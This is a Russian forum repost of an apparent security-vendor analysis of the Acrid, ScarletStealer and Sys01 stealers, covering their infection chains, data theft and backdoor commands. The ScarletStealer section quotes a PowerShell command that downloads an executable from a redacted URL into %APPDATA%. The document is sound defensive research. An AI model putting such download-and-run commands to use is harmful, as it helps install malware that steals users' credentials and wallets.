Стилеры, стилеры и еще раз стилеры

BOOX

Стаж на ФС с 2012 года
Команда форума
Служба безопасности
Private Club
Регистрация
23/1/18
Сообщения
29.329
Репутация
11.800
Реакции
62.021
RUB
50
Тенденция к появлению новых и новых версий этого вредоносного ПО сохраняется: за последние месяцы мы подготовили еще несколько закрытых отчетов.


В них мы описали, в частности, совсем новые стилеры Acrid и ScarletStealer, а также стилер Sys01, получивший значительное обновление с момента выхода .

Acrid

Acrid — это новый стилер, обнаруженный в декабре прошлого года. Несмотря на название он не имеет ничего общего со . Acrid написан на C++ для 32-разрядных систем, хотя в наши дни большинство систем 64-разрядные. При внимательном изучении причина компиляции для 32-разрядной среды становится ясна: разработчик решил использовать технику Heaven’s Gate. Она позволяет 32-разрядным приложениям получать доступ к 64-разрядной среде, чтобы обойти определенные меры безопасности.


Реализация техники Heaven’s Gate в стилере Acrid

Функциональность стилера обычна для вредоносного ПО такого типа:
  • кража данных браузера (файлы cookie, пароли, другие данные для входа в систему, данные банковских карт и так далее);
  • кража локальных криптовалютных кошельков;
  • кража файлов с определенными именами (wallet.dat, password.docx и так далее);
  • кража учетных данных из установленных приложений (FTP-менеджеры, мессенджеры и другие).
Собранные данные архивируются и отправляются на командный сервер злоумышленников.

Уровень сложности стилера можно оценить как средний. В нем есть некоторые изощренные детали, вроде шифрования строк, но нет ничего инновационного.

ScarletStealer

В январе прошлого года мы изучали загрузчик, который мы назвали Penguish (и подробно описали в закрытом отчете). Одной из полезных нагрузок, которые он загружал, был ранее неизвестный стилер. Его мы назвали ScarletStealer.

Это довольно необычный стилер: большая часть его функциональности содержится в других бинарных файлах (приложениях и расширениях Chrome), которые он загружает. Если быть более точным: когда ScarletStealer запускается, он ищет криптовалюты и криптокошельки, проверяя определенные пути к папкам (например, %APPDATA%\Roaming\Exodus). Если стилер что-то нашел, он начинает загружать дополнительные исполняемые файлы с помощью следующей команды PowerShell:

1
2
powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' -
OutFile $env:APPDATA\\.........exe

Среди загружаемых им бинарных файлов — metaver_.exe (используется для кражи содержимого из расширений Chrome), meta.exe (модифицирует ярлык Chrome так, чтобы он запускался с вредоносным расширением) и другие. Большинство исполняемых файлов ScarletStealer имеют цифровую подпись.


Функция перехвата данных Metamask

Стилер очень слабо развит в плане функциональности и содержит множество ошибок, недоработок и избыточного кода. Например, он пытается закрепиться в системе, создавая раздел реестра для автозапуска. Этот раздел реестра содержит путь к файлу Runtimebroker_.exe, однако ни в одном из файлов стилера мы не нашли кода, в котором бы упоминался хоть один исполняемый файл с таким именем.

Поэтому довольно странно, что этот стилер распространяется через длинную цепочку загрузчиков (последний из которых — это Penguish) и подписан цифровым сертификатом. Можно было бы ожидать, что все эти усилия увенчаются загрузкой чего-то более продвинутого, чем ScarletStealer.

Жертвы этого стилера в основном находятся в Бразилии, Турции, Индонезии, Алжире, Египте, Индии, Вьетнаме, США, Южной Африке и Португалии.

Sys01

SYS01 (другие названия — Album Stealer, S1deload Stealer) — относительно малоизвестный стилер, существующий как минимум с 2022 года. Его уже описывали , и . В их отчетах можно проследить эволюцию от стилера на C# до стилера на PHP. Когда эту кампанию начали изучать мы, то заметили сочетание этих двух полезных нагрузок — на C# и на PHP.

Единственное, что не изменилось в новой версии стилера, — это вектор заражения. Как и раньше, пользователей обманом побуждают загрузить вредоносный ZIP-архив, замаскированный под видео для взрослых, через страницу на Facebook:


Реклама вредоносного ZIP-архива на взломанной странице Facebook

Архив содержит легитимный бинарный файл (в данном случае WdSyncservice.exe, переименованный в PlayVideoFull.exe), который загружает вредоносную библиотеку DLL с именем WDSync.dll. DLL открывает видео для взрослых и попутно запускает следующую полезную нагрузку, которая представляет собой вредоносный PHP-файл, закодированный с помощью .

Этот PHP-файл, в свою очередь, вызывает скрипт install.bat, а тот выполняет команду PowerShell, чтобы запустить следующий этап. Он называется runalayer и запускает то, что, видимо, и является финальной полезной нагрузкой, называемой Newb.

Однако между последней версией стилера и предыдущими публично раскрытыми версиями есть разница, которая заключается в разделенной функциональности. Стилер в его нынешнем виде (Newb) содержит функциональность для кражи данных, связанных с Facebook, и для отправки на командный сервер злоумышленников украденных данных браузера, которые размещены и организованы в определенной структуре каталога. Он также имеет функции бэкдора и может выполнять, среди прочих, следующие команды.

КомандаОписание
dllЗагрузить файл, завершить все указанные процессы и запустить новый процесс с помощью PowerShell (команда расшифровывает, распаковывает и запускает указанный файл). Процедура PowerShell работает так же, как и в прошлых наблюдавшихся версиях.
cmdЗавершить процессы из указанного списка и запустить новый процесс.
dlsЗагрузить файл, завершить все указанные процессы и запустить новый указанный процесс.

Но код, который, собственно, собирает данные браузера, чтобы Newb отправил их на командный сервер злоумышленников, обнаружился в другом образце — imageclass. Изучив код бэкдора Newb, мы с большой долей уверенности считаем, что imageclass попадает в систему через него, хотя не можем определить это достоверно.

В исходном ZIP-архиве содержится еще один вредоносный PHP-файл — include.php. Этот файл имеет схожую с Newb функциональность бэкдора и принимает многие из его команды и в том же формате.

Жертвы этой кампании были найдены по всему миру, но большинство из них — в Алжире (чуть более 15%). Скорее всего, это связано с вектором заражения: он может быть сильно локализованным. Мы также заметили, что разработчики вредоносной программы отдают предпочтение доменам верхнего уровня .top.

Заключение

Стилеры — это реальная и по-прежнему актуальная угроза. В этой статье мы рассмотрели эволюцию известного стилера, а также два совершенно новых стилера разных уровней сложности. Тот факт, что новые программы этого типа продолжают появляться, причем с разной сложностью и функциональностью, говорит о том, что на преступном рынке существует на них спрос.

Стилеры опасны своими последствиями. Эти программы похищают пароли и другую конфиденциальную информацию, которая впоследствии может быть использована в других вредоносных целях, а это приводит как минимум к большим финансовым потерям. Чтобы защитить себя от стилеров и других угроз, важно соблюдать несколько основных правил кибергигиены: всегда устанавливайте последние патчи безопасности на свое программное обеспечение, не скачивайте файлы из сомнительных источников и не открывайте вложения в сомнительных письмах. Для большей уверенности можно установить защитное решение, которое отслеживает события на вашем компьютере.

Индикаторы компрометации​

Acrid




ScarletStealer




Sys01





 
  • Теги
    crimeware вредоносное по стилер
  • Сверху Снизу